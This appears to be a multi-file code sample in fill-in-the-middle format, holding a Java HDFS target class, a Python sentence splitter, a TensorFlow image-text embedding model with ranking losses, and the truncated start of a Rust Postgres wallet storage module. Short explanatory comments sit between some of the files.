      );<|fim▁hole|>

    if (rollIfHeader && (rollHeaderName == null || rollHeaderName.isEmpty())) {
      issues.add(
          context.createConfigIssue(
              Groups.OUTPUT_FILES.name(),
              getConfigBeanPrefix() + "rollHeaderName",
              Errors.HADOOPFS_51
          )
      );
    }

    if (issues.isEmpty()) {
      try {
        userUgi.doAs(new PrivilegedExceptionAction<Void>() {
          @Override
          public Void run() throws Exception {
            getCurrentWriters().commitOldFiles(fs);
            if (getLateWriters() != null) {
              getLateWriters().commitOldFiles(fs);
            }
            return null;
          }
        });
      } catch (Exception ex) {
        LOG.error("Exception while initializing bean configuration", ex);
        issues.add(context.createConfigIssue(null, null, Errors.HADOOPFS_23, ex.toString(), ex));
      }
      toHdfsRecordsCounter = context.createCounter("toHdfsRecords");
      toHdfsRecordsMeter = context.createMeter("toHdfsRecords");
      lateRecordsCounter = context.createCounter("lateRecords");
      lateRecordsMeter = context.createMeter("lateRecords");
    }

    if (issues.isEmpty()) {
      try {
        // Recover previously written files (promote all _tmp_ to their final form).
        //
        // We want to run the recovery only if
        // * Not preview
        // * This is not a WHOLE_FILE since it doesn't make sense there (tmp files will be discarded instead)
        // * User explicitly did not disable the recovery in configuration
        // * We do have the directory template available (e.g. it's not in header)
        // * Only for the first runner, since it would be empty operation for the others
        recoveryOldTempFile(context);
      } catch (Exception ex) {
        LOG.error(Errors.HADOOPFS_59.getMessage(), ex.toString(), ex);
        issues.add(
            context.createConfigIssue(
                Groups.OUTPUT_FILES.name(),
                getConfigBeanPrefix() + "dirPathTemplate",
                Errors.HADOOPFS_59,
                ex.toString(),
                ex
            )
        );
      }
    }
  }

  public void destroy() {
    LOG.info("Destroy");
    try {
      if (userUgi != null) {
        userUgi.doAs((PrivilegedExceptionAction<Void>) () -> {
          try {
            //Don't close the whole files on destroy, we should only do it after
            //the file is copied (i.e after a record is written, the file will be closed)
            //For resume cases(i.e file copied fully but not renamed/ file partially copied)
            //we will overwrite the _tmp file and start copying from scratch
            if (currentWriters != null) {
              if (dataFormat != DataFormat.WHOLE_FILE) {
                currentWriters.closeAll();
              }
              currentWriters.getWriterManager().issueCachedEvents();
            }

            if (lateWriters != null) {
              if (dataFormat != DataFormat.WHOLE_FILE) {
                lateWriters.closeAll();
              }
              lateWriters.getWriterManager().issueCachedEvents();
            }
          } finally {
            if (fs != null) {
              fs.close();
              fs = null;
            }
          }
          return null;
        });
      }
    } catch (Exception ex) {
      LOG.warn("Error while closing FileSystem URI='{}': {}", hdfsUri, ex.toString(), ex);
    }
  }

  private long initTimeConfigs(
      Stage.Context context,
      String configName,
      String configuredValue,
      Groups configGroup,
      boolean allowNegOne,
      Errors errorCode,
      List<Stage.ConfigIssue> issues) {
    long timeInSecs = 0;
    try {
      ELEval timeEvaluator = context.createELEval(configName);
      context.parseEL(configuredValue);
      timeInSecs = timeEvaluator.eval(context.createELVars(), configuredValue, Long.class);
      if (timeInSecs <= 0 && (!allowNegOne || timeInSecs != -1)) {
        issues.add(
            context.createConfigIssue(
                configGroup.name(),
                getConfigBeanPrefix() + configName,
                errorCode
            )
        );
      }
    } catch (Exception ex) {
      issues.add(
          context.createConfigIssue(
              configGroup.name(),
              getConfigBeanPrefix() + configName,
              Errors.HADOOPFS_06,
              configuredValue,
              ex.toString(),
              ex
          )
      );
    }
    return timeInSecs;
  }

  Counter getToHdfsRecordsCounter() {
    return toHdfsRecordsCounter;
  }

  Meter getToHdfsRecordsMeter() {
    return toHdfsRecordsMeter;
  }

  Counter getLateRecordsCounter() {
    return lateRecordsCounter;
  }

  Meter getLateRecordsMeter() {
    return lateRecordsMeter;
  }

  String getTimeDriver() {
    return timeDriver;
  }

  ELEval getTimeDriverElEval() {
    return timeDriverElEval;
  }

  UserGroupInformation getUGI() {
    return userUgi;
  }

  protected ActiveRecordWriters getCurrentWriters() {
    return currentWriters;
  }

  protected ActiveRecordWriters getLateWriters() {
    return lateWriters;
  }

  @VisibleForTesting
  Configuration getHdfsConfiguration() {
    return hdfsConfiguration;
  }

  @VisibleForTesting
  CompressionCodec getCompressionCodec() throws StageException {
    return compressionCodec;
  }

  @VisibleForTesting
  long getLateRecordLimitSecs() {
    return lateRecordsLimitSecs;
  }

  //private implementation

  protected void validateStageForWholeFileFormat(Stage.Context context, List<Stage.ConfigIssue> issues) {
    maxFileSize = 0;
    maxRecordsPerFile = 1;
    idleTimeout = "-1";
    if (fileType != HdfsFileType.WHOLE_FILE) {
      issues.add(
          context.createConfigIssue(
              Groups.OUTPUT_FILES.name(),
              getConfigBeanPrefix() + "fileType",
              Errors.HADOOPFS_53,
              fileType,
              HdfsFileType.WHOLE_FILE.getLabel(),
              DataFormat.WHOLE_FILE.getLabel()
          )
      );
    }
    if (dataFormat != DataFormat.WHOLE_FILE) {
      issues.add(
          context.createConfigIssue(
              Groups.DATA_FORMAT.name(),
              getConfigBeanPrefix() + "dataFormat",
              Errors.HADOOPFS_60,
              dataFormat.name(),
              DataFormat.WHOLE_FILE.getLabel(),
              HdfsFileType.WHOLE_FILE.getLabel()
          )
      );
    }
  }

  protected boolean validateHadoopDir(final Stage.Context context, final String configName, final String configGroup,
                                      String dirPathTemplate, final List<Stage.ConfigIssue> issues) {
    if (!dirPathTemplate.startsWith("/")) {
      issues.add(context.createConfigIssue(configGroup, configName, Errors.HADOOPFS_40));
      return false;
    }

    // User can opt out of the canary write to HDFS
    if (!hdfsPermissionCheck) {
      return true;
    }

    final AtomicBoolean ok = new AtomicBoolean(true);
    dirPathTemplate = (dirPathTemplate.isEmpty()) ? "/" : dirPathTemplate;
    try {
      final Path dir = new Path(dirPathTemplate);
      userUgi.doAs(new PrivilegedExceptionAction<Void>() {
        @Override
        public Void run() throws Exception {
          // Based on whether the target directory exists or not, we'll do different check
          if (!fs.exists(dir)) {
            // Target directory doesn't exist; we'll try to create a directory and then drop it
            Path workDir = dir;

            // We don't want to pollute HDFS with random directories, so we'll create exactly one directory under
            // another already existing directory on the template path. (e.g. if template is /a/b/c/d and only /a
            // exists, then we will create new dummy directory in /a during this test).
            while (!fs.exists(workDir)) {
              workDir = workDir.getParent();
            }

            // Sub-directory to be created in existing directory
            workDir = new Path(workDir, "_sdc-dummy-" + UUID.randomUUID().toString());
            try {
              if (fs.mkdirs(workDir)) {
                LOG.info("Creating dummy directory to validate permissions {}", workDir.toString());
                fs.delete(workDir, true);
                ok.set(true);
              } else {
                issues.add(context.createConfigIssue(configGroup, configName, Errors.HADOOPFS_41));
                ok.set(false);
              }
            } catch (IOException ex) {
              issues.add(context.createConfigIssue(configGroup, configName, Errors.HADOOPFS_42, ex.toString()));
              ok.set(false);
            }
          } else {
            // Target directory exists, we will just create empty test file and then immediately drop it
            try {
              Path dummy = new Path(dir, "_sdc-dummy-" + UUID.randomUUID().toString());
              fs.create(dummy).close();
              fs.delete(dummy, false);
              ok.set(true);
            } catch (IOException ex) {
              issues.add(context.createConfigIssue(configGroup, configName, Errors.HADOOPFS_43, ex.toString()));
              ok.set(false);
            }
          }
          return null;
        }
      });
    } catch (Exception ex) {
      issues.add(context.createConfigIssue(configGroup, configName, Errors.HADOOPFS_44, ex.toString()));
      ok.set(false);
    }
    return ok.get();
  }

  @Override
  protected FileSystem createFileSystem() throws Exception {
    try {
      return userUgi.doAs(new PrivilegedExceptionAction<FileSystem>() {
        @Override
        public FileSystem run() throws Exception {
          return FileSystem.newInstance(new URI(hdfsUri), hdfsConfiguration);
        }
      });
    } catch (IOException ex) {
      throw ex;
    } catch (RuntimeException ex) {
      Throwable cause = ex.getCause();
      if (cause instanceof Exception) {
        throw (Exception) cause;
      }
      throw ex;
    }
  }

  private void recoveryOldTempFile(Stage.Context context) throws IOException, InterruptedException {
    if (!context.isPreview() &&
        dataFormat != DataFormat.WHOLE_FILE &&
        !skipOldTempFileRecovery &&
        !dirPathTemplateInHeader &&
        context.getRunnerId() == 0) {
      userUgi.doAs((PrivilegedExceptionAction<Void>) () -> {
        getCurrentWriters().getWriterManager().handleAlreadyExistingFiles();
        return null;
      });
    }
  }
}<|fim▁end|>
}
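The Idle Timeout and Late Record Time Limit configs above accept either a bare number of seconds or an EL expression that multiplies the MINUTES/HOURS constants (e.g. '${30 * MINUTES}'). A toy Python sketch of that arithmetic; this is only an illustration, not the StreamSets EL evaluator, and the function name and regex are invented:

import re

CONSTANTS = {'SECONDS': 1, 'MINUTES': 60, 'HOURS': 3600}

def el_to_seconds(expr):
    # '${N * UNIT}' -> N * seconds-per-unit; bare numbers are already seconds.
    m = re.fullmatch(r'\$\{\s*(-?\d+)\s*\*\s*(SECONDS|MINUTES|HOURS)\s*\}', expr.strip())
    if m:
        return int(m.group(1)) * CONSTANTS[m.group(2)]
    return int(expr)

assert el_to_seconds('${1 * HOURS}') == 3600
assert el_to_seconds('${30 * MINUTES}') == 1800
assert el_to_seconds('-1') == -1  # -1 opts out of the idle timeout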
<|file_name|>get_words.py<|end_file_name|><|fim▁begin|># get_words.py
# returns a list of words from the relevant lines of a speech
# J. Hassler Thurston
# RocHack Hackathon December 7, 2013

import csv
import nltk

def get_words(line_list):
    sentences = parse_to_sentences(line_list)
    #print sentences
    words = [nltk.word_tokenize(sent) for sent in sentences]
    # NOTE: currently returns the sentences, not the tokenized words
    return sentences

# returns a list of sentences from the list of lines
def parse_to_sentences(line_list):<|fim▁hole|>
    #print line_list
    sentence_list = []
    for line in line_list:
        # insert the sentences into the list
        sentence_list.extend(line.split('.'))
    return sentence_list

# exports the list of words to a CSV file (currently only exports sentences)
def export_to_csv(word_list, filename):
    out = open(filename, 'w')
    #wr = csv.writer(out, quoting=csv.QUOTE_ALL)
    for sentence in word_list:
        out.write(sentence + '\n')
    out.close()<|fim▁end|>
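A small driver for the helpers above; the speech lines and output filename are invented for illustration:

lines = ["Four score and seven years ago our fathers brought forth. A new nation",
         "conceived in liberty. Dedicated to a proposition"]
sentences = get_words(lines)               # currently yields sentences (see note above)
export_to_csv(sentences, 'sentences.csv')  # writes one sentence per line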
<|file_name|>image_text_model.py<|end_file_name|><|fim▁begin|># Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from __future__ import division
from __future__ import print_function

from transformer_layers import TransformerBlock
import tensorflow as tf


def mean_pool(x, m):
  m = tf.cast(m, tf.float32)
  x = tf.multiply(x, tf.expand_dims(m, 2))
  x = tf.reduce_sum(x, 1) / tf.reduce_sum(m, 1, keepdims=True)
  return x


class RNN(object):
  def __init__(self, num_units):
    self.rnn_fw = tf.keras.layers.CuDNNLSTM(units=num_units // 2,
                                            return_sequences=True,
                                            go_backwards=False,
                                            name='rnn_fw')
    self.rnn_bw = tf.keras.layers.CuDNNLSTM(units=num_units // 2,
                                            return_sequences=True,
                                            go_backwards=False,
                                            name='rnn_bw')

  def forward(self, inputs, masks):
    def rnn_fn(x, m, rnn):
      x = rnn(x)
      # x = tf.reduce_max(x, 1)  # max pooling
      # x = mean_pool(x, m)  # mean pooling
      indices = tf.reduce_sum(m, 1, keepdims=True) - 1
      x = tf.gather_nd(x, tf.cast(indices, tf.int32), batch_dims=1)
      return x

    lengths = tf.reduce_sum(tf.cast(masks, tf.int32), axis=1)
    masks = tf.cast(masks, tf.float32)
    inputs = tf.multiply(inputs, tf.expand_dims(masks, 2))
    inputs_bw = tf.reverse_sequence(inputs, lengths, 1, 0)
    outputs_fw = rnn_fn(inputs, masks, self.rnn_fw)
    outputs_bw = rnn_fn(inputs_bw, masks, self.rnn_bw)
    outputs = tf.concat([outputs_fw, outputs_bw], axis=1)
    return outputs


class Transformer(object):
  def __init__(self, num_units):
    self.hidden = tf.keras.layers.Dense(num_units)
    self.transformer = TransformerBlock(num_units, num_units * 4, num_layer=2)

  def forward(self, inputs, masks):
    masks = tf.cast(masks, tf.float32)
    inputs = tf.multiply(inputs, tf.expand_dims(masks, 2))
    inputs = self.hidden(inputs)
    return self.transformer.forward(inputs, masks)


class DAN(object):
  def __init__(self, num_units):
    self.hidden = tf.keras.layers.Dense(num_units, activation=tf.nn.relu)

  def forward(self, inputs, masks):
    masks = tf.cast(masks, tf.float32)
    inputs = tf.multiply(inputs, tf.expand_dims(masks, 2))
    inputs = tf.reduce_sum(inputs, 1) / tf.reduce_sum(masks, 1, keepdims=True)
    return self.hidden(inputs)


def get_text_encoder(encoder_type='rnn'):
  if encoder_type == 'rnn':
    return RNN
  elif encoder_type == 'trans':
    return Transformer
  elif encoder_type == 'dan':
    return DAN
  else:
    raise ValueError(encoder_type)


class ImageTextEmbedding(object):
  def __init__(self, word_emb, encoder_dim, encoder_type='rnn', norm=True,
               drop_p=0.25, contrastive=False, margin=0.5, num_neg_sample=10,
               lambda1=1.0, lambda2=1.0, internal=True):
    self.word_emb = tf.Variable(tf.convert_to_tensor(word_emb), name="emb",
                                trainable=True)
    self.text_encoder = get_text_encoder(encoder_type)(encoder_dim)
    self.text_feat_proj = tf.keras.layers.Dense(encoder_dim)
    self.img_feat_proj = tf.keras.layers.Dense(encoder_dim)
    self.dropout = tf.keras.layers.Dropout(drop_p)
    self.margin = margin
    self.num_neg_sample = num_neg_sample
    self.lambda1 = lambda1
    self.lambda2 = lambda2
    self.contrastive = contrastive
    self.internal = internal
    self.norm = norm  # normalize the embedding
    self.text_outputs = []

  def forward_img(self, img_inputs, training):
    x = self.img_feat_proj(img_inputs)
    if self.norm:
      x = tf.nn.l2_normalize(x, axis=-1)
    return self.dropout(x, training=training)

  def forward_text(self, text_inputs, text_masks, training):
    if len(text_inputs.get_shape()) == 2:
      x = tf.nn.embedding_lookup(self.word_emb, text_inputs)
    else:
      x = text_inputs
    self.text_outputs.append(mean_pool(x, text_masks))
    x = self.text_encoder.forward(x, text_masks)
    self.text_outputs.append(x)
    x = self.text_feat_proj(x)
    if self.norm:
      x = tf.nn.l2_normalize(x, axis=-1)
    return self.dropout(x, training=training)

  def encode(self, img_inputs, text_inputs, text_masks, training):
    img_feats = self.forward_img(img_inputs, training)
    text_feats = self.forward_text(text_inputs, text_masks, training)
    return img_feats, text_feats

  def forward(self, img_inputs, text_inputs, text_masks, labels, training):
    img_feats, text_feats = self.encode(img_inputs, text_inputs, text_masks,
                                        training)
    if self.contrastive:
      loss = contrastive_loss(img_feats, text_feats, self.margin)
      sent_im_dist = - similarity_fn(text_feats, img_feats)
    elif self.internal:
      loss = internal_loss(img_feats, text_feats, labels)
      sent_im_dist = - similarity_fn(text_feats, img_feats)
    else:
      loss = embedding_loss(img_feats, text_feats, labels, self.margin,
                            self.num_neg_sample, self.lambda1, self.lambda2)
      sent_im_dist = pdist(text_feats, img_feats)
    rec = recall_k(sent_im_dist, labels, ks=[1, 5, 10])
    return loss, rec


def order_sim(im, s):
  im = tf.expand_dims(im, 0)
  s = tf.expand_dims(s, 1)
  diff = tf.clip_by_value(s - im, 0, 1e6)
  dist = tf.sqrt(tf.reduce_sum(diff ** 2, 2))
  scores = -tf.transpose(dist)
  return scores


def similarity_fn(im, s, order=False):
  if order:
    return order_sim(im, s)
  return tf.matmul(im, s, transpose_b=True)


def internal_loss(im_embeds, sent_embeds, im_labels):
  logits_s = tf.matmul(sent_embeds, im_embeds, transpose_b=True)
  cost_s = tf.nn.softmax_cross_entropy_with_logits_v2(im_labels, logits_s)
  logits_im = tf.matmul(im_embeds, sent_embeds, transpose_b=True)
  cost_im = tf.nn.softmax_cross_entropy_with_logits_v2(tf.transpose(im_labels), logits_im)
  return tf.reduce_mean(cost_s) + tf.reduce_mean(cost_im)


def contrastive_loss(im_embeds, sent_embeds, margin, max_violation=True):
  """ modified https://github.com/fartashf/vsepp/blob/master/model.py#L260 """
  scores = similarity_fn(im_embeds, sent_embeds)
  batch_size = tf.shape(im_embeds)[0]
  diagonal = tf.diag_part(scores)
  d1 = tf.reshape(diagonal, (batch_size, 1))
  d2 = tf.reshape(diagonal, (1, batch_size))
  cost_s = tf.clip_by_value(margin + scores - d1, 0, 1e6)
  cost_im = tf.clip_by_value(margin + scores - d2, 0, 1e6)
  zeros = tf.zeros(batch_size)
  cost_s = tf.matrix_set_diag(cost_s, zeros)
  cost_im = tf.matrix_set_diag(cost_im, zeros)
  if max_violation:
    cost_s = tf.reduce_max(cost_s, 1)
    cost_im = tf.reduce_max(cost_im, 0)
  return tf.reduce_sum(cost_s) + tf.reduce_sum(cost_im)


def pdist(x1, x2):
  """
  x1: Tensor of shape (h1, w)
  x2: Tensor of shape (h2, w)
  Return pairwise distance for each row vector in x1, x2
  as a Tensor of shape (h1, h2)
  """
  x1_square = tf.reshape(tf.reduce_sum(x1 * x1, axis=1), [-1, 1])
  x2_square = tf.reshape(tf.reduce_sum(x2 * x2, axis=1), [1, -1])<|fim▁hole|>


def embedding_loss(im_embeds, sent_embeds, im_labels, margin, num_neg_sample,
                   lambda1, lambda2):
  """
  im_embeds: (b, 512) image embedding tensors
  sent_embeds: (sample_size * b, 512) sentence embedding tensors
      where the order of sentence corresponds to the order of images
      and sentences for the same image are next to each other
  im_labels: (sample_size * b, b) boolean tensor, where (i, j) entry is
      True if and only if sentence[i], image[j] is a positive pair
  """
  im_labels = tf.cast(im_labels, tf.bool)
  # compute embedding loss
  num_img = tf.shape(im_embeds)[0]
  num_sent = tf.shape(sent_embeds)[0]
  sent_im_ratio = tf.div(num_sent, num_img)

  sent_im_dist = pdist(sent_embeds, im_embeds)
  # image loss: sentence, positive image, and negative image
  pos_pair_dist = tf.reshape(tf.boolean_mask(sent_im_dist, im_labels), [num_sent, 1])
  neg_pair_dist = tf.reshape(tf.boolean_mask(sent_im_dist, ~im_labels), [num_sent, -1])
  im_loss = tf.clip_by_value(margin + pos_pair_dist - neg_pair_dist, 0, 1e6)
  im_loss = tf.reduce_mean(tf.nn.top_k(im_loss, k=num_neg_sample)[0])
  # sentence loss: image, positive sentence, and negative sentence
  neg_pair_dist = tf.reshape(
      tf.boolean_mask(tf.transpose(sent_im_dist), ~tf.transpose(im_labels)), [num_img, -1])
  neg_pair_dist = tf.reshape(
      tf.tile(neg_pair_dist, [1, sent_im_ratio]), [num_sent, -1])
  sent_loss = tf.clip_by_value(margin + pos_pair_dist - neg_pair_dist, 0, 1e6)
  sent_loss = tf.reduce_mean(tf.nn.top_k(sent_loss, k=num_neg_sample)[0])
  # sentence only loss (neighborhood-preserving constraints)
  sent_sent_dist = pdist(sent_embeds, sent_embeds)
  sent_sent_mask = tf.reshape(tf.tile(tf.transpose(im_labels), [1, sent_im_ratio]),
                              [num_sent, num_sent])
  pos_pair_dist = tf.reshape(tf.boolean_mask(sent_sent_dist, sent_sent_mask),
                             [-1, sent_im_ratio])
  pos_pair_dist = tf.reduce_max(pos_pair_dist, axis=1, keep_dims=True)
  neg_pair_dist = tf.reshape(tf.boolean_mask(sent_sent_dist, ~sent_sent_mask),
                             [num_sent, -1])
  sent_only_loss = tf.clip_by_value(margin + pos_pair_dist - neg_pair_dist, 0, 1e6)
  sent_only_loss = tf.reduce_mean(tf.nn.top_k(sent_only_loss, k=num_neg_sample)[0])

  loss = im_loss * lambda1 + sent_loss + sent_only_loss * lambda2
  return loss


def recall_k(sent_im_dist, im_labels, ks=(1, 5, 10)):
  """
  Compute recall at given ks.
  """
  im_labels = tf.cast(im_labels, tf.bool)

  def retrieval_recall(dist, labels, k):
    # Use negative distance to find the index of
    # the smallest k elements in each row.
    pred = tf.nn.top_k(-dist, k=k)[1]
    # Create a boolean mask for each column (k value) in pred,
    # s.t. mask[i][j] is 1 iff pred[i][k] = j.
    pred_k_mask = lambda topk_idx: tf.one_hot(topk_idx, tf.shape(labels)[1],
                                              on_value=True, off_value=False,
                                              dtype=tf.bool)
    # Create a boolean mask for the predicted indices
    # by taking logical or of boolean masks for each column,
    # s.t. mask[i][j] is 1 iff j is in pred[i].
    pred_mask = tf.reduce_any(tf.map_fn(
        pred_k_mask, tf.transpose(pred), dtype=tf.bool), axis=0)
    # pred_mask = tf.map_fn(create_pred_mask, pred)
    # Entry (i, j) is matched iff pred_mask[i][j] and labels[i][j] are 1.
    matched = tf.cast(tf.logical_and(pred_mask, labels), dtype=tf.float32)
    return tf.reduce_mean(tf.reduce_max(matched, axis=1))

  img_sent_recall = [retrieval_recall(tf.transpose(sent_im_dist),
                                      tf.transpose(im_labels), k) for k in ks]
  sent_img_recall = [retrieval_recall(sent_im_dist, im_labels, k) for k in ks]

  return img_sent_recall + sent_img_recall<|fim▁end|>
return tf.sqrt(x1_square - 2 * tf.matmul(x1, tf.transpose(x2)) + x2_square + 1e-4)
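The completion above finishes pdist via the identity ||a - b||^2 = ||a||^2 - 2 a·b + ||b||^2, with the 1e-4 term guarding the sqrt against small negative values from floating-point cancellation. A NumPy sketch of the same computation, useful for checking shapes and values outside a TF graph (NumPy is an assumption here; the model file itself uses TensorFlow):

import numpy as np

def pdist_np(x1, x2):
    # x1: (h1, w), x2: (h2, w) -> (h1, h2) pairwise Euclidean distances
    x1_sq = np.sum(x1 * x1, axis=1).reshape(-1, 1)
    x2_sq = np.sum(x2 * x2, axis=1).reshape(1, -1)
    return np.sqrt(x1_sq - 2 * x1 @ x2.T + x2_sq + 1e-4)

a = np.random.rand(3, 512)
b = np.random.rand(5, 512)
assert pdist_np(a, b).shape == (3, 5)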
<|file_name|>postgres_storage.rs<|end_file_name|><|fim▁begin|>extern crate owning_ref; extern crate sodiumoxide; extern crate r2d2; extern crate r2d2_postgres; use postgres; use self::r2d2_postgres::{TlsMode, PostgresConnectionManager}; use serde_json; use self::owning_ref::OwningHandle; use std::rc::Rc; use std::time::Duration; use errors::wallet::WalletStorageError; use errors::common::CommonError; use wql::language; use wql::query; use wql::transaction; use wql::storage::{StorageIterator, WalletStorage, StorageRecord, EncryptedValue, Tag, TagName}; fn default_true() -> bool { true } fn default_false() -> bool { false } #[derive(Debug, Serialize, Deserialize, PartialEq)] #[serde(rename_all = "camelCase")] pub struct RecordOptions { #[serde(default = "default_false")] retrieve_type: bool, #[serde(default = "default_true")] retrieve_value: bool, #[serde(default = "default_false")] retrieve_tags: bool } impl RecordOptions { pub fn id() -> String { let options = RecordOptions { retrieve_type: false, retrieve_value: false, retrieve_tags: false }; serde_json::to_string(&options).unwrap() } pub fn id_value() -> String { let options = RecordOptions { retrieve_type: false, retrieve_value: true, retrieve_tags: false }; serde_json::to_string(&options).unwrap() } } impl Default for RecordOptions { fn default() -> RecordOptions { RecordOptions { retrieve_type: false, retrieve_value: true, retrieve_tags: false, } } } #[derive(Debug, Serialize, Deserialize, PartialEq)] #[serde(rename_all = "camelCase")] pub struct SearchOptions { #[serde(default = "default_true")] retrieve_records: bool, #[serde(default = "default_false")] retrieve_total_count: bool, #[serde(default = "default_false")] retrieve_type: bool, #[serde(default = "default_true")] retrieve_value: bool, #[serde(default = "default_false")] retrieve_tags: bool } impl SearchOptions { pub fn id_value() -> String { let options = SearchOptions { retrieve_records: true, retrieve_total_count: true, retrieve_type: true, retrieve_value: true, retrieve_tags: false }; serde_json::to_string(&options).unwrap() } } impl Default for SearchOptions { fn default() -> SearchOptions { SearchOptions { retrieve_records: true, retrieve_total_count: false, retrieve_type: false, retrieve_value: true, retrieve_tags: false, } } } const _POSTGRES_DB: &str = "postgres"; const _PLAIN_TAGS_QUERY: &str = "SELECT name, value from tags_plaintext where item_id = $1"; const _ENCRYPTED_TAGS_QUERY: &str = "SELECT name, value from tags_encrypted where item_id = $1"; const _CREATE_WALLET_DATABASE: &str = "CREATE DATABASE $1"; const _CREATE_SCHEMA: [&str; 12] = [ "CREATE TABLE IF NOT EXISTS metadata ( id BIGSERIAL PRIMARY KEY, value BYTEA NOT NULL )", "CREATE UNIQUE INDEX IF NOT EXISTS ux_metadata_values ON metadata(value)", "CREATE TABLE IF NOT EXISTS items( id BIGSERIAL PRIMARY KEY, type BYTEA NOT NULL, name BYTEA NOT NULL, value BYTEA NOT NULL, key BYTEA NOT NULL )", "CREATE UNIQUE INDEX IF NOT EXISTS ux_items_type_name ON items(type, name)", "CREATE TABLE IF NOT EXISTS tags_encrypted( name BYTEA NOT NULL, value BYTEA NOT NULL, item_id BIGINT NOT NULL, PRIMARY KEY(name, item_id), FOREIGN KEY(item_id) REFERENCES items(id) ON DELETE CASCADE ON UPDATE CASCADE )", "CREATE INDEX IF NOT EXISTS ix_tags_encrypted_name ON tags_encrypted(name)", "CREATE INDEX IF NOT EXISTS ix_tags_encrypted_value ON tags_encrypted(value)", "CREATE INDEX IF NOT EXISTS ix_tags_encrypted_item_id ON tags_encrypted(item_id)", "CREATE TABLE IF NOT EXISTS tags_plaintext( name BYTEA NOT NULL, value TEXT NOT NULL, 
item_id BIGINT NOT NULL, PRIMARY KEY(name, item_id), FOREIGN KEY(item_id) REFERENCES items(id) ON DELETE CASCADE ON UPDATE CASCADE )", "CREATE INDEX IF NOT EXISTS ix_tags_plaintext_name ON tags_plaintext(name)", "CREATE INDEX IF NOT EXISTS ix_tags_plaintext_value ON tags_plaintext(value)", "CREATE INDEX IF NOT EXISTS ix_tags_plaintext_item_id ON tags_plaintext(item_id)" ]; const _DROP_WALLET_DATABASE: &str = "DROP DATABASE $1"; const _DROP_SCHEMA: [&str; 4] = [ "DROP TABLE tags_plaintext", "DROP TABLE tags_encrypted", "DROP TABLE items", "DROP TABLE metadata" ]; #[derive(Debug)] struct TagRetriever<'a> { plain_tags_stmt: postgres::stmt::Statement<'a>, encrypted_tags_stmt: postgres::stmt::Statement<'a>, } type TagRetrieverOwned = OwningHandle<Rc<r2d2::PooledConnection<PostgresConnectionManager>>, Box<TagRetriever<'static>>>; impl<'a> TagRetriever<'a> { fn new_owned(conn: Rc<r2d2::PooledConnection<PostgresConnectionManager>>) -> Result<TagRetrieverOwned, WalletStorageError> { OwningHandle::try_new(conn.clone(), |conn| -> Result<_, postgres::Error> { let (plain_tags_stmt, encrypted_tags_stmt) = unsafe { ((*conn).prepare(_PLAIN_TAGS_QUERY)?, (*conn).prepare(_ENCRYPTED_TAGS_QUERY)?) }; let tr = TagRetriever { plain_tags_stmt, encrypted_tags_stmt, }; Ok(Box::new(tr)) }).map_err(WalletStorageError::from) } fn retrieve(&mut self, id: i64) -> Result<Vec<Tag>, WalletStorageError> { let mut tags = Vec::new(); let plain_results = self.plain_tags_stmt.query(&[&id])?; let mut iter_plain = plain_results.iter(); while let Some(res) = iter_plain.next() { let row = res; tags.push(Tag::PlainText(row.get(0), row.get(1))); } let encrypted_results = self.encrypted_tags_stmt.query(&[&id])?; let mut iter_encrypted = encrypted_results.iter(); while let Some(res) = iter_encrypted.next() { let row = res; tags.push(Tag::Encrypted(row.get(0), row.get(1))); } Ok(tags) } } struct PostgresStorageIterator { rows: Option< OwningHandle< OwningHandle< Rc<r2d2::PooledConnection<PostgresConnectionManager>>, Box<postgres::stmt::Statement<'static>>>, Box<postgres::rows::Rows<>>>>, tag_retriever: Option<TagRetrieverOwned>, options: RecordOptions, total_count: Option<usize>, iter_count: usize, } impl PostgresStorageIterator { fn new(stmt: Option<OwningHandle<Rc<r2d2::PooledConnection<PostgresConnectionManager>>, Box<postgres::stmt::Statement<'static>>>>, args: &[&postgres::types::ToSql], options: RecordOptions, tag_retriever: Option<TagRetrieverOwned>, total_count: Option<usize>) -> Result<PostgresStorageIterator, WalletStorageError> { let mut iter = PostgresStorageIterator { rows: None, tag_retriever, options, total_count, iter_count: 0 }; if let Some(stmt) = stmt { iter.rows = Some(OwningHandle::try_new( stmt, |stmt| unsafe { (*(stmt as *mut postgres::stmt::Statement)).query(args).map(Box::new) }, )?); } Ok(iter) } } impl StorageIterator for PostgresStorageIterator { fn next(&mut self) -> Result<Option<StorageRecord>, WalletStorageError> { // if records are not requested. 
if self.rows.is_none() { return Ok(None); } // TODO not sure if iter().nth() is the most efficient way to iterate through the result set // TODO investigate if the Iter object can be cached between calls to next() match self.rows.as_mut().unwrap().iter().nth(self.iter_count) { Some(row) => { self.iter_count = self.iter_count + 1; let name = row.get(1); let value = if self.options.retrieve_value { Some(EncryptedValue::new(row.get(2), row.get(3))) } else { None }; let tags = if self.options.retrieve_tags { match self.tag_retriever { Some(ref mut tag_retriever) => Some(tag_retriever.retrieve(row.get(0))?), None => return Err(WalletStorageError::CommonError( CommonError::InvalidState("Fetch tags option set and tag retriever is None".to_string()) )) } } else { None }; let type_ = if self.options.retrieve_type { Some(row.get(4)) } else { None }; Ok(Some(StorageRecord::new(name, value, type_, tags))) } //Some(Err(err)) => Err(WalletStorageError::from(err)), None => Ok(None) } } fn get_total_count(&self) -> Result<Option<usize>, WalletStorageError> { Ok(self.total_count) } } #[derive(Deserialize, Debug)] pub struct PostgresConfig { url: String, // TODO add additional configuration options tls: Option<String>, // default off max_connections: Option<String>, // default 2 min_idle_tim: Option<String>, // default 0 connection_timeout: Option<String>, // default 5 } #[derive(Deserialize, Debug)] pub struct PostgresCredentials { account: String, password: String, admin_account: Option<String>, admin_password: Option<String>, } #[derive(Debug)] pub struct PostgresStorage { pool: r2d2::Pool<PostgresConnectionManager>, } pub trait WalletStorageType { fn create_storage(&self, id: &str, config: Option<&str>, credentials: Option<&str>, metadata: &[u8]) -> Result<(), WalletStorageError>; fn open_storage(&self, id: &str, config: Option<&str>, credentials: Option<&str>) -> Result<Box<PostgresStorage>, WalletStorageError>; fn delete_storage(&self, id: &str, config: Option<&str>, credentials: Option<&str>) -> Result<(), WalletStorageError>; } pub struct PostgresStorageType {} impl PostgresStorageType { pub fn new() -> PostgresStorageType { PostgresStorageType {} } fn _admin_postgres_url(config: &PostgresConfig, credentials: &PostgresCredentials) -> String { let 